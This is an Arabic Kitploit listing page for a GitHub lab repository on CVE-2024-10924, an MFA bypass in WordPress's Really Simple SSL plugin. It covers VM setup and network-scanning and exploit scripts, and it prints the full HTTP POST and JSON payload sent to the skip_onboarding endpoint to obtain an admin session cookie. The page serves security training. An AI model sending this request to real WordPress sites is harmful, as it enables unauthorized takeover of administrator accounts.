Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10924-Bypass-MFA-Wordpress-LAB — بيئة مختبر وسكربت استغلال لثغرة CVE-2024-10924، يوضح تجاوز المصادقة متعددة العوامل (MFA) في ووردبريس عبر نقطة نهاية skip_onboarding في إضافة Really Simple SSL. | Kitploit
أدوات/GitHubGitHub/d1se0/cve-2024-10924-bypass-mfa-wordpress-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالمصادقةالتعلم والتعليممختبرات وتدريب عملي
GitHub
d1se0/cve-2024-10924-bypass-mfa-wordpress-lab

CVE-2024-10924-Bypass-MFA-Wordpress-LAB

بيئة مختبر وسكربت استغلال لثغرة CVE-2024-10924، يوضح تجاوز المصادقة متعددة العوامل (MFA) في ووردبريس عبر نقطة نهاية skip_onboarding في إضافة Really Simple SSL.

عرض المستودع
42منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-10924 تجاوز MFA في WordPress - مختبر الاستغلال

يوفر هذا المستودع مختبرًا لاستغلال الثغرة CVE-2024-10924 في WordPress، وتحديدًا لتجاوز المصادقة الثنائية (MFA) والوصول إلى لوحة إدارة WordPress.

المتطلبات الأساسية

لنشر هذا المختبر في بيئتك، اتبع الخطوات التالية:

نشر WordPress على VMware

سيتعين عليك فك ضغط ملف zip الخاص بالمختبر، وبالانتقال إلى VMWare سيتعين عليك النقر على Open لاستيراد جهاز، ونختار الملف المسمى Ubuntu-Bypass-MFA-Wordpress.vmx، وأخيرًا سيتعين علينا النقر على لتشغيل الجهاز المعرّض للثغرة.

Power

تحميل المختبر

إعداد Kali Linux

على جهاز Kali الخاص بك، قم بتثبيت الأدوات اللازمة وتأكد من تثبيت التطبيقات التالية:

  • nmap: لإجراء عمليات فحص الشبكة.
  • requests: لإجراء طلبات HTTP (إذا لم يكن لديك، فثبّت requests باستخدام pip install requests).
  • rich: لإخراج أنيق إلى وحدة التحكم (ثبّته باستخدام pip install rich).

الحصول على عنوان IP لجهاز WordPress

للحصول على عنوان IP الخاص بجهاز WordPress في بيئة الشبكة، قم بتشغيل السكربت التالي من جهاز Kali الخاص بك:

root@kitploit:~
$ python3 knowIPwordpress.py
root@kitploit:~
This script does the following:

Detect your local IP. Scans the corresponding network segment to find active IPs. Perform a port scan for HTTP services. Check that the WordPress machine's IP has the title "Bypass-MFA" in its HTTP service. Once found, it will show you the URL where you can access the WordPress administration panel:

root@kitploit:~
Accede a WordPress en: http://<IP>/wp-admin
root@kitploit:~

## تجاوز التحقق المزدوج (MFA):

### بيانات اعتماد WordPress:

admin:admin

root@kitploit:~

عند محاولة تسجيل الدخول إلى `WordPress`، سيطلب منك `المصادقة الثنائية (MFA)`. لتجاوز هذه الخطوة، قم بتشغيل السكربت التالي على جهاز `Kali` الخاص بك:

```bash
$ python3 bypass-MFA-Wordpress.py

كيف يعمل السكربت bypass-MFA-Wordpress.py يستغل هذا السكربت الثغرة CVE-2024-10924 ويتجاوز التحقق المزدوج للوصول إلى لوحة إدارة WordPress.

تدفق السكربت:

الحصول على كوكي الجلسة: يرسل السكربت طلب HTTP إلى نقطة النهاية reallysimplessl/v1/two_fa/skip_onboarding للحصول على كوكي جلسة صالح.

يتم إرسال الطلب بالمعلومات التالية:

root@kitploit:~
{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

طلب تسجيل الدخول:

بمجرد الحصول على الكوكي، يطلب السكربت اسم المستخدم وكلمة المرور الخاصة بـ WordPress. ثم أرسل طلب POST إلى نقطة النهاية wp-admin/profile.php باستخدام بيانات الاعتماد المقدمة لتسجيل الدخول.

إنشاء ملف HTML:

إذا نجح التجاوز، يحفظ السكربت الاستجابة من لوحة تحكم المسؤول في ملف .html ويفتحه في متصفحك الافتراضي.

ستتمكن الآن من الوصول إلى لوحة إدارة WordPress!

الطريقة اليدوية لتجاوز MFA في WordPress:

إذا كنت تريد القيام بذلك يدويًا باستخدام BurpSuite وتريد معرفة Endpoint الذي يجب إرسال الطلب إليه لالتقاط Cookies، فيمكنك فعل ذلك بالطريقة التالية:

root@kitploit:~
$ python3 endpointWordpress.py

سيخبرنا هذا بالكود الذي سنضعه في BurpSuite لنتمكن من التقاط Cookies، وفي حالتي سيكون شيئًا مثل هذا:

root@kitploit:~
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

تنفيذ الأسلوب اليدوي عبر فيديو:

https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce

مزيد من المعلومات في فيديو يوتيوب الخاص بي:

LINK = فيديو CVE-2024-10924-Bypass-MFA-Wordpress-LAB

تنزيل الأداة